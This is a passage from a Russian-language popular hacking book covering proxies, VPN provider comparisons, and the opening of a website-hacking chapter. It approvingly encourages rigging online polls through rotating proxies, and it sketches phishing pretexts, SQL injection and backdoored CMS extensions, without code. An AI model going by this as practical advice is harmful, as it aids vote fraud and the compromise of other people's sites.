- Все сетевые программы, установленные на твоем компе, начнут получать доступ к Интернету через сеть сотового оператора. Во-первых, скорость доступа к сайтам из-за этого снизится, во-вторых, трафик может быстро закончиться. Не забывай о Windows 10 с ее обновлениями - если загрузка обновления придется на тот момент, когда твой комп будет подключен к сотовой сети, тебе очень скоро придется пополнять счет! Впрочем, далее в этой книге будет рассказано как выключить обновления Windows и остановить слежку за собой.

Итак, расшарить доступ к Интернету с мобильного телефона можно так:

- Android: Настройки, Подключения, Точка доступа и модем, Мобильная точка доступа, Включено. Также можете отредактировать имя Wi-Fi-сети, которая будет создана смартфоном, и задать пароль для доступа к ней (рис. 1.1).
- iOS: Настройки, Режим модема, Разрешать другим. Далее вы сможете отредактировать пароль созданной айфоном сети. Название сети будет таким же, как название устройства, заданное в общих настройках телефона (рис. 1.2).

Все, что тебе останется после этого, – подключить свой компьютер к сети, созданной смартфоном. Нажми значок беспроводного соединения в нижнем правом углу экрана и просто выбери нужную Wi-Fi-сеть.

С этим способом все. Были рассмотрены все нюансы, поэтому можно смело переходить к следующему способу.



Рис. 1.1. Расшаривание доступа к Интернету в Android



Рис. 1.2. Расшаривание доступа к Интернету в iOS

## 1.3. Анонимайзер

Сайты-анонимайзеры работают так: ты заходишь на сайт, вводишь название сайта, который ты хочешь открыть, и получаешь к нему доступ. Казалось бы, все просто. Но существует ряд нюансов, по которым мы НЕ рекомендуем использование сайтов-анонимайзеров:

Многие сайты не поддерживают протокол HTTPS. Следовательно, провайдер или твой администратор, проанализировав переданные пакеты, сможем увидеть, какие сайты ты посещал. Это очень плохо. Узнать, поддерживает анонимайзер HTTPS или нет, очень и очень просто. Введи в Гугл запрос anonymizer. Получишь список результатов – список сайтованонимайзеров. Посмотри, если адрес сайта начинается с http://, значит анонимайзер не поддерживает HTTPS. Если же адрес начинается с https://, то поддерживается безопасная версия протокола и весь обмен с этим сайтом будет проходить в зашифрованном виде – твой админ или провайдер не узнает, какие сайты ты посещал. Конечно, сейчас есть воз-

можность частичной расшифровки этих данных, но используется она не всегда, ввиду большой нагрузки на оборудование – если пользователей тысячи, попробуй-ка расшифровать трафик каждого...

 Часто такие сайты вставляют в целевые страницы свою рекламу. Они за счет этого живут, но это напрягает. Попытки использовать блокировщики рекламы приводят к тому, что сайты отказываются работать, пока вы их не выключите.



Рис. 1.3. Как определить тип протокола по адресу сайта

## 1.4. Анонимные прокси-серверы

Анонимные прокси-серверы – это узлы в Интернете, настроенные для работы в качестве посредников между твоим узлом и узлом, доступ к которому ты хочешь получить. Просто введи в поисковике запрос "анонимные прокси", и увидишь список ресурсов, на которых можно найти эти самые анонимные прокси.

Как правило, списки прокси-серверов обновляются каждый час. Зачем? Потому что в обычном виде анонимный прокси – это самый что ни есть обычный прокси-сервер, который администратор забыл или не успел настроить надлежащим образом, поэтому он разрешает подключение не только внутренних пользователей, но и любых других – со всего мира.



Рис. 1.4. Результаты поиска анонимных прокси

Ты можешь воспользоваться этой возможностью для следующих целей:

- Смена IP-адреса когда ты будешь подключаться через анонимных прокси-сервер к другим узлам, то они будут видеть не твой реальный IP-адрес, а IP-адрес прокси-сервера. Это полезно, например, для смены страны "проживания". Некоторые ресурсы блокируют доступ пользователей из определенных стран. Использование анонимного прокси-сервера позволяет устранить сей недостаток. Например, если какой-то сайт требует немецкий IP, тебе нужно найти немецкий прокси и подключиться через него.
- 2. Получение доступа к заблокированному сайту как уже было описано ранее, провайдер увидит, что твой компьютер "общается" с незаблокированным узлом. А что происходит дальше ему уже не видно. А дальше этот незаблокированный узел-посредник будет подключаться к нужному тебе узлу, и ты сможешь открыть заблокированный ресурс.

Способ обхода посредством анонимных прокси-серверов подойдет для:

• Доступа к заблокированному узлу из корпоративной сети или сети домашнего провайдера.

21

- Накрутки результатов голосований как правило, все голосовалки учитывают IP-адрес узла и не позволяют голосовать более одного раза с одного IP. Сменяя прокси-серверы, ты сможешь проголосовать несколько раз и тем самым помочь своему другу/подруге или даже самому себе получить место выше в рейтинге. Когда ты "накрутишь" пару сотен голосов в глазах своих друзей ты будешь настоящим хакером!
- Смены IP-адреса об этом мы уже говорили.

Анонимные прокси таят в себе угрозу безопасности. Да, списки прокси обновляются каждый час. Кто их обновляет и кто находит в сети общедоступные прокси? Волонтеры. Они публикуют списки на своем сайте, на котором размещена реклама, и рекламные поступления формируют их заработок. Вроде бы все логично. Но если ты исследуешь списки прокси некоторое время, скажем, на протяжении одной недели или даже месяца, то ты увидишь, что некоторые прокси никогда не покидают список – они существуют постоянно. На этом легенда о забывчивых админах начинает рушиться. Смысл кому-то разворачивать прокси и предоставлять доступ всем совершенно бесплатно?

Такие прокси могут быть развернуты злоумышленниками или даже спецслужбами для перехвата твоих данных. Когда твои данные проходят через прокси, они полностью доступны для владельца прокси – ведь они проходят через его оборудование. Именно поэтому прокси можно использовать, если не планируешь передавать конфиденциальные данные. Мы бы не рекомендовали через анонимные прокси входить в свой почтовый ящик, на свою страничку в социальной сети и т.д. Если нужно подключиться к заблокированному в твоей стране торрент-трекеру, чтобы скачать фильм, музыку или программу, – это пожалуйста. Проголосовать за друга или подругу, добавив дополнительные голоса, – тоже можно. Также можно обращаться к сайту, который блокирует доступ из твоей страны. Часто такое происходит с сайтами телевизионных каналов – "Контент заблокирован в вашей стране" – надпись знакомая всем. В общем, для всего, что не требует ввода конфиденциальных данных (паролей, платежной информации и т.д.), можно использовать анонимные прокси.

Теперь, разберемся, как их использовать. Зайди на любой сайт со списком прокси. Формат списка всегда отличается, но в целом он такой: IP-адрес, порт, страна, тип прокси, скорость. Остальная информация нем не интересна. Также нам не интересны прокси типа SOCKS, нужны только HTTP/ HTTPS. Поэтому если на сайте есть фильтр, нужно отфильтровать проксисерверы HTTP/HTTPS, чтобы остальные не мешали. Скорость позволяет понять, насколько быстро будут открываться сайты через этот прокси. Чем выше скорость, тем лучше.

Осталось только настроить браузер:

- Chrome, IE, Edge настройка производится через окно Параметры, Сеть и Интернет, Прокси-сервер. Включи параметр Использовать прокси-сервер и установи IP-адрес и номер порта прокси-сервера, который был обнаружен в списке. Нажми кнопку Сохранить. Вернись в окно браузера и перейди на сайт https://myip.ru/. Просмотри свой IP-адрес. Он должен измениться. Если ты до этого не знал, какой у тебя IP-адрес, узнать его нужно до включения прокси. Или же выключи прокси, обнови страничку myip.ru. Суть следующая если ты все сделал правильно, IP-адрес должен измениться после включения прокси.
- Firefox выбери Настройки, Параметры сети, нажми кнопку Настроить. В появившемся окне выбери Ручная настройка прокси и введи параметры прокси-сервера его IP-адрес и порт. Нажмите кнопку ОК и перейди на сайт *туір.ru* для просмотра IP-адреса. Если все хорошо (IP изменился), можно посещать заблокированные ресурсы.

Параметры	La serie de la companya de la compa
	Прокси-сервер
	Настройка прокси вручную
Сеть и Интернет	Использование прокси-сервера для подключений к Ethernet или селям WF.FL ти параметры не применлютот для VPN- позновновий
Остояние	Tradionic actions
	Использовать прокси-сервер
IR WI-FI	Откл.
😰 Ethernet	Адрес Порт
🐡 Набор номера	Не использовать прокси-сервер для адресов, которые
% VPN	начинаются с указанных ниже записей. Для разделения записей используйте точку с запятой (;).
∮> Режим «в самолете»	
<sup>()</sup> р) Мобильный хот-спот	
🕑 Использование данных	
a history cepter	
	У вас появились вопросы?

Puc. 1.5. Настройки Chrome, IE, Edge

Если смена прокси – не разовая акция и ты планируешь регулярно изменять прокси-серверы, можем порекомендовать расширение FoxyProxy. Расширение позволяет добавлять прокси-серверы в собственный список и удобно переключаться между ними (рис. 1.7).

IN 10 A 10 15 7 C 0 етры соеди Настройка прокси для доступа в Интернет Ropt 8080

Рис. 1.6. Настройка Firefox

Ф Настройки	🗴 🎓 vopoznowa gorozwawa 🗙 🌴 Fosylvery Stantast - Jarpon 🗴 🥸 Fosylvery golawru sp		
			·····································
		110	and the second second second second second
R Parothe systemy'	Добавить прокси		신승 있는 것은 것이 있는 것이 없다.
		-	
) (hoosepage ) ge.	/ Название или описание (опфисиально)		Тип прокси
Conteni	123		нць
	Lines		Прокси IP адрес или имя DNS и
> Carone went to unc	#66cc66		ITTERTITE MERINARIA COM
	Клавиатурная комбинация для шаблона		flopr #
	Включено	7	300
	Добазить whitelist шаблон совладающий со всеми URL 0	3	Varia num-productions (mean-solitic-lum)
	Не использовать локальный и внутренний/частный IP адрес 0		Likename
			Пароль (опционально) +
	and the second se		AND DESCRIPTION OF TAXABLE PARTY OF TAXA
	University		отранить карельнить ещи Сооранить к и рерзитировать шавочния. Сотранить

Рис. 1.7. Приложение FoxyProxy

## 1.5. Три заветные буквы – VPN

#### 1.5.1. Основная информация

VPN (Virtual Private Network) – виртуальная частная сеть. Раньше данный инструмент использовался исключительно высококвалифицированными ITспециалистами – администраторами крупных корпоративных сетей, специалистами по компьютерной безопасности и т.д.

С недавнего времени с VPN знакома чуть ли не каждая домохозяйка. Почему? Во-первых, потому что использование VPN стало предельно простым. Во-вторых, появилась такая необходимость.

VPN – это многоцелевая технология, и использовать ее только для смены IP-адреса – это как стрелять из пушки по воробьям. Вот для чего можно использовать VPN обычному пользователю:

- 1. Защита передаваемых по сети данных VPN шифрует все передаваемые по сети данные. Об этом мы еще поговорим.
- 2. Смена страны, IP-адреса подобно анонимным прокси, VPN можно использовать для смены страны и IP-адреса.
- 3. Доступ к закрытым сайтам поскольку вы будете подключаться через VPN, то частная виртуальная сеть будет выступать в роли посредника. Если сравнивать с анонимными прокси, то принцип такой же, но при этом все данные VPN-соединения зашифрованы и не могут быть расшифрованы ни вашим провайдером, ни кем-либо по пути следования этих данных.

Если о доступе к закрытым сайтам и смене IP-адреса уже было много сказано в этой главе, то остановимся подробнее на защите передаваемой информации. Данные могут быть перехвачены на любом участке их передачи. Представим, что ты подключился к публичной сети или к сети Wi-Fi отеля, ресторана, да хоть к соседской сети – к любой сети, которую настраивал сторонний человек. Передаваемые данные проходят через маршрутизатор сети и могут быть перехвачены на нем. Ведь в качестве маршрутизатора может выступать не дешевая коробочка за 20-30\$, а полноценный компьютер, протоколирующий ваш трафик. Данные может перехватить провайдер – ведь ни проходят через его оборудование. Даже если твой провайдер не перехватывает данные, они не моментально переходят на узел назначения. По пути к этому узлу они проходят через множество маршрутизаторов и теоретически могут быть перехвачены на любом из них. Любой маршрутизатор на пути следования пакета может перехватить его.

А ведь через все эти маршрутизаторы проходят все передаваемые вами данные. Не все сайты используют https/SSL для шифрования данных, да и уже появились способы расшифровки HTTPS-трафика.

Защитить передаваемые по сети данные можно с помощью VPN (*Virtual Private Network*). VPN создает зашифрованный туннель, через который передаются твои данные. Передаваемые данные будут зашифрованы, поэтому даже если кто-то и перехватит их, то ничего с ними сделать не может. Однако нужно понимать, что есть некоторые особенности использования этой технологии:

- Данные могут быть перехвачены самим VPN-провайдером. Хотя некоторые провайдеры и заявляют, что не протоколируют действия пользователей, в большинстве случаев это ложь. Практически все известные VPN-провайдеры собирают максимум информации о пользователе – так они перестраховываются на тот случай, если пользователь будет совершать незаконные действия в сети. Если нужен настоящий VPN, можно купить виртуальный сервер (за пределами страны) и настройте на нем VPN (в Интернете есть множество инструкций). Тогда оплата будет производиться не VPN-провайдеру, а облачному провайдеру за аренду виртуальной машины.
- 2. При установке VPN-соединения, весь трафик пройдет через это соединение. Это означает, что браузер, Skype, все мессенджеры, почтовый клиент и прочие программы будут работать через это соединение. Важно понимать, что в большинстве случаев VPN-соединение платное и в тарифный план включен определенный объем трафика. Поскольку после установки VPN-соединения все программы будут работать через него (в том числе торрент-клиент), купленный объем трафика быстро закончится. Поэтому VPN-соединением нужно пользоваться экономно выключать, когда оно вам не нужно, и следить за тем, какие сетевые программы запущены, когда активно VPN-соединение.

**3.** Если конечная цель – скрыть только веб-трафик (http/https), тогда можно использовать для этого либо Tor (https://www.torproject.org/), либо браузер Opera, в который уже встроен VPN-функционал.

Существует много VPN-провайдеров. Все они работают примерно одинаково: пользователь загружает программу-клиент, покупает пакет для VPNдоступа, запускает программу, указывает свои данные (логин и пароль) и жмет кнопку **Connect** или другую подобную – по смыслу.

Вот список некоторых популярных VPN-провайдеров с небольшими комментариями (цены могут отличаться от текущих на данный момент):

- Private Internet Access (https://privateinternetaccess.com/) предоставляет тестовый доступ сроком на 7 дней, стоимость в месяц 9.95\$, при оплате за год – 71.88\$/год. Серверы находятся в США, Германии, Великобритании, Канаде, Франции, Швеции, Нидерландах, КНР, Румынии и в некоторых других странах (всего 32 страны). При установке соединения пользователь может выбрать страну, которой будет принадлежать его выходной IP-адрес (который "увидят" сайты, которые он посещаете).
- HideMyAss (https://hidemyass.com/) недавно снизил цены, и теперь стоимость в месяц составляет чуть менее 3\$, за год чуть менее 36\$, тестового периода нет, но есть moneyback, срок которого – 30 дней (ты платишь за месяц, если что-то не устроит, то тебе возвращают деньги). Серверы расположены в 190 странах мира. Пока это самый дешевый провайдер.
- ExpressVPN (https://www.express-vpn.com/) VPN-провайдер с высокими ценами (99.95\$ за год, 12.95\$ за месяц), но это компенсируется тем, что скорость и трафик никак не ограничиваются. Хотя на фоне HMA предложение ExpressVPN выглядит космически дорого.
- VPNShield (https://www.vpnshieldapp.com/) штаб-квартира находится в Европе, следовательно, на нее не распространяется законодательство США, и провайдер может не сохранять журналы доступа. Вдобавок недавно он снизил цены, что делает его действительно неплохим вариантом.
- Betternet (https://www.betternet.co/) бесплатный VPN-сервис. Клиенты существует для Windows, Android (можно загрузить из Google Play), iOS (доступен в App Store). Существует и платная версия 12.99\$/месяц. За эти деньги пользователь получит возможность выбора локации сервера, более быстрое соединение, отсутствие рекламы и сможет подключить до 5 устройств на один аккаунт. Бесплатный вариант не требует никакой регистрации, но скорость доступа порой оставляет желать лучшего.

 Орега – в браузер Орега уже встроен бесплатный VPN-сервис. Для его включения нужно открыть настройки браузера. Включение/выключение VPN-сервиса осуществляется путем нажатия кнопки VPN в адресной строке. Оранжевый цвет кнопки говорит о том, что VPN выключен (рис. 1.11). Включение VPN приводит к тому, что данные, отправляемые и принимаемые браузером, будут передаваться по VPN. Обрати внимание: данные других сетевых программ, в отличие от использования вышеупомянутых сервисов, будут передаваться по обычному, незашифрованному соединению. Если нужно просто посещать время от времени заблокированный сайт, то использование Орега может стать находкой. Скорость загрузки файлов не всегда высокая, но сайты по встроенному VPN открываются с приемлемой скоростью.

Примечание. Также в главе 5 будет рассмотрен еще один VPN-сервис. Его изюминка – в простом VPN-клиенте для Linux, работающем по образу и подобию привычных VPN-клиентов – запустил программу и нажал кнопку Подключиться или аналогичную. Далеко не все VPN-сервисы предоставляют такие удобные VPN-клиенты для Linux. Наоборот, нам пришлось постараться, чтобы отыскать такой сервис. Он платный, но его цена не превышает тарифы сервисов, рассмотренных в этой главе. Даже есть одноразовый тариф Вечность ценой в 199\$, заплатив за который вы больше не будете платить за VPN.

Что выбрать? Все зависит от конечной цели:

- Нерегулярное использование для посещения заблокированных сайтов лучший вариант Betternet – не нужно платить и можно подключить до 5 устройств на одну учетную запись. Также можно рассмотреть использование браузера Opera.
- Получение доступа к сайту, который требует IP-адреса определенной страны мира – здесь нужно выбирать тот сервис, серверы которого находятся в нужной стране. Самый богатый выбор – у HideMyAss, серверы которого находятся в 190 странах мира.
- Регулярное использование для шифрования всего трафика лучше всего подойдет VPNShield. Демократичные цены, и компания не находится в США, поэтому логи доступа могут действительно не сохранятся.

#### 1.5.2. Обзор популярных VPN-провайдеров

Если ты любишь во всем разбираться и тщательно подходишь к выбору VPN-провайдера, то этот раздел специально для тебя.

#### **VPN Shield**

Сервис https://www.vpnshieldapp.com/ отличается очень демократичными ценами. Так, неделя доступа обойдется всего в 2.99\$, а месяц – всего в 5.99\$. Подписку на 3 месяца можно купить за 15\$, а на год – за 40\$. Нужно отметить, что в этом году данный сервис подорожал. В прошлом году год доступа можно было купить за 30\$. С другой стороны, регулярно проходят всевозможные акции, и на момент этих строк доступна акция, позволяющая купить 3 года доступа за 100\$. Выходит по 2.78\$ в месяц, что очень и очень дешево – дешевле, чем доступ к сервису Youtube Music.

Компания находится в Люксембурге, а это означает, что законодательство США на нее не распространяется, но у компании есть серверы в США, Германии, Англии, Нидерландах и Китае.

Сервис поддерживает все популярные протоколы: PPTP, L2TP, IPsec, OpenVPN.

К недостаткам можно отнести службу поддержки, работающую только через e-mail – не очень оперативное средство связи.

Зато компания не собирает (если и собирает, то явно об этом не сказано) информацию о пользователях. Доступен Android-клиент, скачать который можно с Play Market, что упростит настройку пользовательского устройства для работы с этим сервисом:

https://play.google.com/store/apps/details?id=com.vpnshieldapp&hl=ru

Также доступны клиенты для операционных систем Windows и iOS (iPhone), что позволяет охватить самые популярные устройства в мире.

### IPVanish VPN

Штаб-квартира этого сервиса (https://www.ipvanish.com/) находится в США. Это крупный американский VPN-провайдер.

Тарифных плана три – или каждый месяц 4.49\$, или каждые три месяца 12\$, или раз в год, но 35\$. Трафик (вне зависимости от выбранного тарифного плана) не ограничивается. В отличие от VPNShield этот сервис, наоборот, подешевел в два раза и может претендовать на звание самого дешевого VPN-сервиса.

Точек присутствия не так много, как у предыдущего провайдера, но и не мало. Серверы находится в США, Канаде, Великобритании, Франции, Японии, Малазии, Венгнии, Нидерландах, Южной Африке, Испании, Швеции и Южной Корее.

Данный сервис собирает информацию о пользователях и работает в рамках акта DMCA Copyright Policy. Однако на сайте сказано, что собирается только самая необходимая информация, но какая именно – не сообщается.

Поддерживаются протоколы РРТР, L2ТР и OpenVPN. Протокол IPSec не поддерживается и в этом случае.

Недостатки: запись информации о пользователе и отсутствие возможности использования IPSec.

## HideMyAss (HMA)

Штаб-квартира этого сервиса (*http://hidemyass.com/*) находится в Англии, но точки присутствия есть в 190 странах мира (всего насчитывается 1100 серверов).

Предоставляет огромное число дополнительных сервисов, однако описание большинства из них не соответствует тому, что указано на сайте. Как уже отмечалось, VPN-сервис снизил цены и теперь стоимость за год составляет чуть менее 36\$, а во время всяких акций – и того меньше. По цене он может теперь конкурировать с IPVanish, а недавно он был очень дорогим – за полгода нужно было заплатить 40\$.

Есть поддержка протоколов L2TP, OpenVPN, PPTP (IPSec не поддерживается). Сервис рекомендует использовать протокол OpenVPN.

Недостатки у этого сервиса тоже есть, и существенные. Сервис собирает много информации о деятельности пользователя и хранит информацию два года. Так что название сервиса не совсем соответствует действительности. Также нет возможности использования протокола IPSec и нет клиентов для Android.

## **Private Internet Access**

Private Internet Access (*http://privateinternetaccess.com/*) – один из старейших VPN-сервисов, предоставляющих услуги анонимизации в сети. Кроме привычных услуг (анонимизация, обеспечение конфиденциальности, шифрование), предоставляют защиту от изменения DNS серверов (DNS leak protection). Также у пользователя есть возможность использовать до трех устройств одновременно. Первое, на что пользователи обращают внимание при выборе VPN-сервиса (да и всего прочего в большинстве случаев), – это тарифные планы. Тарифных плана три: на месяц, на год и на три года. Самый дорогой первый тарифный план (напоминаю, что цены в книге могут отличаться от текущих в зависимости от даты прочтения книги) – 11.69 евро (евро, не долларов!) в месяц, во втором случае один месяц доступа обойдется в 3.10 евро (37.19 евро за год), в третьем за три года нужно заплатить 70 евро (1.94 евро в месяц). Если рассматривать цену за год, то это один из самых дорогих VPN-сервисов в мире, но если есть 70 евро и желание с ними расстаться, то можно цена становится довольно приятной. Ранее 3 года доступа обошлись бы в 420 евро.

Все тарифные планы предоставляют одинаковые сервисы и возможность использовать различные типы подключений (OpenVPN, PPTP и IPSec), неограниченный трафик (то есть 6.95\$ – это окончательная стоимость, больше ни за что платить не нужно) и возможность выбрать шлюз в любой стране, где работает сервис, а именно: США, Великобритания, Германия, Канада, Франция, Швеция и Швейцария, Нидерланды, Гонконг (Китайская Народная Республика), Румыния. Сервис предоставляет бесплатный тестовый доступ сроком на 7 дней. Также есть гарантированный возврат денег в течение 7 дней, если что-то не понравится.

Техническая поддержка осуществляется по *e-mail* и через чат сайта. На самом же сайте есть довольно обширный список часто задаваемых вопросов.

Сервис предоставляет собственные VPN-клиенты для Android. VPN-клиент для Android 5.x/4.x можно установить с Play Market:

https://play.google.com/store/apps/details?id=com.privateinternetaccess.android

Для более старых версий (2.х и 3.х) клиент можно скачать с сайта VPNсервиса:

https://www.privateinternetaccess.com/pages/client-support/#android\_ipsec\_l2tp

Конечно, как у всего на свете, у этого сервиса есть недостатки:

- Не предоставляется информация о загруженности каналов передачи данных и серверов. Выбирая сервер, вы не знаете, насколько быстрым он будет.
- Если пользователь нарушит авторские права, информация о нем будет отправлена непосредственно правообладателю (акт Digital Millennium Copyright Act).

 Небольшое количество точек присутствия – всего 10 стран, хотя шлюзов гораздо больше, но многие из них расположены в разных районах США, Канады и Великобритании.

### **StrongVPN**

Сервис StrongVPN (*https://strongvpn.com/*) тоже родом из США. Является одним из первых провайдеров, предоставляющих услуги шифрования передаваемой информации.

На сайте сервиса вы найдете много разных и довольно гибких тарифных планов и огромное количество документации, с помощью которой вы настроите любое устройство, поддерживающее VPN.

На данный момент есть два тарифных плана – или 10\$ в месяц, или 35\$ за год. Других вариантов нет. Тестового периода нет, но компания гарантирует возврат денег (moneyback), если у тебя не получить настроить или использовать VPN-подключение в течение 7 дней, независимо от выбранного тарифного плана.

Как и в предыдущем случае, можно использовать OpenVPN, L2TP/IPSec и PPTP. Если что-то не получится, к твоим услугам круглосуточная поддержка (в чате, по e-mail, по телефону и Skype). Да, поддержка, как и в предыдущем случае, осуществляется на английском языке.

Огромный недостаток этого сервиса – то, что он полностью работает в рамках законов США, то есть компания сохраняет всю информацию о пользователе, включая журналы доступа, персональную информацию, время подключения и даже твой IP-адрес в вашей внутренней сети за твоим (!) маршрутизатором. Если нужна анонимность и конфиденциальность, то это явно не вариант.

Еще к недостаткам сервиса можно отнести то, что нет никакого клиентского программного обеспечения, то есть пользователю придется настраивать свое устройство самостоятельно. За что такие деньги – непонятно.

## ExpressVPN

Молодой VPN-провайдер (https://www.express-vpn.com/) с довольно высокими ценами. За один месяц нужно отдать 12.95\$ или 99.95\$ за один год. Компания гарантирует возврат денег в течение 30 дней, если у тебя возникли проблемы с использованием сервиса. Точек присутствия тоже немного: США, Великобритания, Нидерланды, Канада, Германия, Гонконг. Пользователь может выбрать любой из сервисов и переключаться между ними.

К достоинствам этого сервиса можно отнести удобное программное обеспечение для Windows, Linux, MacOS и, конечно же, Android. Поддерживаются только протоколы PPTP и OpenVPN.

Недостатки:

- Мало точек присутствия.
- Жалобы на службу технической поддержки от пользователей (много негативных отзывов от пользователей в Интернете).
- Нет поддержки протоколов L2TP и IPsec.

Компания хранит много информации о пользователе, которая может быть передана третьим лицам в соответствии с законодательством США. С другой стороны, на другой страничке они заявляют, что не ведут журналы подключения. Но поскольку это американский провайдер, то он должен работать в соответствии с местным законодательством, поэтому логи все же должны быть.

В этой главе мы разобрались, как сменить свой IP-адрес, как получить доступ к заблокированному ресурсу, как зашифровать передаваемые по Интернету данные. Обрати внимание: сам факт использования VPN или анонимного прокси еще не говорит о том, что вы анонимны. Об анонимности в Интернете мы поговорим в главе 5.



## Глава 2.

## Как взломать сайт

Второй по популярности вопрос – взлом сайта. В этой главе мы рассмотрим, зачем и как взломать сайт, а также приведем реальный пример.

## 2.1. Зачем взламывают сайт

Существуют следующие причины взлома сайтов:

- Кураж некоторые сайты взламываются просто так, без какой-либо цели. Взлом ради взлома. Обычно так "работают" начинающие хакеры, для которых факт самого взлома выше всего остального. Конечной целью взлома является сам взлом. Как правило, делается "дефейс" сайта – меняется главная страница, содержимое которой кричит о том, что сайт взломан. Профи так не работают – они ничего не делают просто так, а взлом сайта производят так, чтобы никто как можно дольше не заметил, что сайт был взломан.
- 2. Получение доступа к конфиденциальной информации хакеры могут взломать сайт ради получения доступа к конфиденциальной информации, например, к базе пользователей. Допустим, конкуренты могут "заказать" хакеру взлом сайта для получения доступа к клиентской базе с целью переманить существующих клиентов.
- 3. Рассылка спама сайт могут взломать для рассылки спама. Хакеры взламывают приличный сайт, который не был замечен никогда в рассылке спама и не состоит в черном списке спам-фильтров. После этого начинают рассылку от имени этого сайта.
- 4. SEO-паразитирование когда с одного ресурса на другой ставится ссылка, сайт делится своим "весом" с тем, на кого ссылается. Это базовый принцип линкбилдинга. Взломанный сайт может использоваться в целях SEO-паразитирования: на страницах портала владельца появляются ссылки на сторонние ресурсы, которые тот не размещал. Атаке подвергаются сайты с ненулевыми показателями ТИЦ и PR, т.к. им есть чем "делиться". В результате за счет взломанного сайта улучшаются позиции в поисковой выдаче сайтов, на которые тот ссылается.
- 5. Другие цели у каждого взлома есть своя цель, и в этом списке представлены далеко не все возможные цели.

### 2.2. Как взламывают сайты

Существует несколько способов взлома сайтов:

- 1. Взлом учетных данных можно подобрать, перехватить или еще каклибо захватить учетные данные (логин и пароль) или к панели управления сайтом, или к FTP/SSH-серверу.
- 2. Поиск уязвимости в коде сайта. Если сайт построен на базе популярной CMS с открытым исходным кодом (WordPress, Joomla! и т.д.), шансы взломать его достаточно велики, особенно если версия движка сайта не самая новая.
- 3. Взлом посредством расширения. Здесь используются элементы программирования вместе с социальным инжинирингом. Хакер предлагает собственнику или веб-мастеру сайта какое-то расширение, веб-мастер его устанавливает, а в расширении находится backdoor – программный код, открывающий двери хакеру на сайт. Техника троянского коня.

Рассмотрим эти способы подробнее.

В первом случае хакер должен как-то заполучить учетные данные для входа на сайт. Перехват этих учетных данных в последнее время очень усложнен, поскольку практически все сайты перешли на HTTPS, поэтому весь обмен данными с ними, в том числе передача имени пользователя и пароля, происходит в зашифрованном виде. Взломать HTTPS-трафик можно, но это может занять длительное время. Аналогично, брутфорс учетных данных займет тоже очень много времени. Взломать с помощью брутфорса сайт гораздо сложнее, чем ту же Wi-Fi-ceть. Следовательно, хакер будет использовать другие способы, например, социальный инжиниринг – можно позвонить и представиться сотрудником службы поддержки хостинга или отправить письмо со ссылкой – мол, место заканчивается/заканчиваются деньги – войдите в личный кабинет для решения проблемы. Ссылка будет вести на сайт, имя которого и внешний вид страницы входа будут напоминать личный кабинет пользователя хостинга (вычислить, какой именно хостинг у сайта – не есть проблема). Пользователь в шоке – как так-то – ведь недавно платил за хостинг. Он переходит по ссылке, видит окно ввода логина и пароля, вводит их, и все... можно считать, что он подарил доступы хакеру. Фишинг и социальный инжиниринг часто оказываются наиболее быстрыми способами взлома сайта, особенно если квалификация хакера не позволяет ему использовать другие способы.

Взлом с помощью уязвимости также является очень популярным методом взлома сайта. На первом месте по уязвимостям – так называемые SQL-инъекции – когда сайту через какую-то форму (например, контактную форму) или GET-параметр передаются SQL-операторы, которые или возвращают необходимую хакеру информацию, или, наоборот, модифицируют информацию в базе данных. Например, с помощью SQL-инъекции можно модифицировать пароль администратора в базе данных, а затем войти через панель управления как администратор и дальше уже сделать с сайтом все, что захочется. При определенных навыках хакера такой способ получения пароля является гораздо более быстрым, чем взлом посредством брутфорсинга. В главе 6, когда мы будем рассматривать Kali Linux, мы рассмотрим некоторые инструменты, а еще больше инструментов поиска уязвимости будет рассмотрено в главе 7 – когда мы будем рассматривать популярный фреймворк для поиска уязвимостей – Metasploit.

Наконец, взлом с помощью расширения также имеет право на жизнь. Но здесь политика хакера нацелена не на конкретный сайт, а на взлом ради взлома или же на создание сети взломанных сайтов. Суть в следующем. Хакер находит какое-то популярное и платное расширение для какой-то популярной CMS. Некоторые расширения могут стоить дорого – от сотен до тысяч долларов (для CMS Magento – это вполне нормальные цены). Хакер покупает такое расширение. Далее он вырезает из него поддержку лицензии, как бы обнуляет ее. Получается, что расширение выполняет свои функции, но при этом работает без лицензии, что позволяет установить его на разные сайты, даже если для этих сайтов лицензия не покупалась. После этого хакер внедряет в код расширения бэкдор – функционал, который позволит хакеру удаленно выполнять различные манипуляции. Какие именно – зависит от того, что нужно хакеру. Можно создать универсальный бэкдор, который бы передавал логин и пароль администратора хакеру, позволял бы через сайт отправлять письма (используется для спама), содержал бы shell, позволяющий выполнять команды на сайте, или же минимальный sql-клиент, позволяющий выполнять sql-операторы. Здесь все зависит от фантазии хакера.

В следующем разделе мы рассмотрим реальный пример взлома и взломаем голосовалку на сайте.

### 2.3. Реальный пример: взламываем голосовалку

Прежде чем продолжить чтение этой главы и попробовать написанное далее на практике, вспомните про ст. 272 – 274 УК РФ. А теперь можно читать дальше!

Наверное, у каждого есть друзья, участвующие в каких-либо конкурсах (либо же у них есть дети, которые участвуют во всевозможных мероприятиях). И вот в один прекрасный момент они обращаются к тебе с просьбой "накрутить" счетчик. Не будем разбираться, хорошо это или нет с моральной точки зрения (с одной стороны – плохо, с другой стороны – это же друзья), а разберемся, как это сделать.

#### 2.3.1. Выбираем оптимальный способ

Способ 1. Друзья друзей

Относительно честный способ (особенно если у тебя много друзей в социальных сетях) – разослать всем сообщение (например, путем создания записи на своей страничке в социальной сети) с просьбой проголосовать и ссылкой на страничку голосования. Можно сделать рассылку по "электронке", Viber, отправить в свой телеграмм-канал и т.д. Способ может принести свои результаты, и при этом тебе ничего не придется делать. Например, у одного моего знакомого более 9000 контактов в скайпе. Если хотя бы 10% проголосуют, это будет 900 голосов, причем абсолютно "легальных" – действительно, зашел человек и проголосовал.

Защиты от этого способа нет, поскольку, по сути, все абсолютно законно. Голосует то человек добровольно, и его никто не принуждает. Ведь просьбу можно поддержать, но можно и проигнорировать.

#### Способ 2. Сервисы накрутки

Второй способ – использование сервисов накрутки. Недостаток этого способа – придется платить за каждый голос. Конечно, все зависит от призового фонда – если игра стоит свеч, почему бы нет? Конкретный сервис накрутки рекомендовать не буду, чтобы не делать никому рекламу.

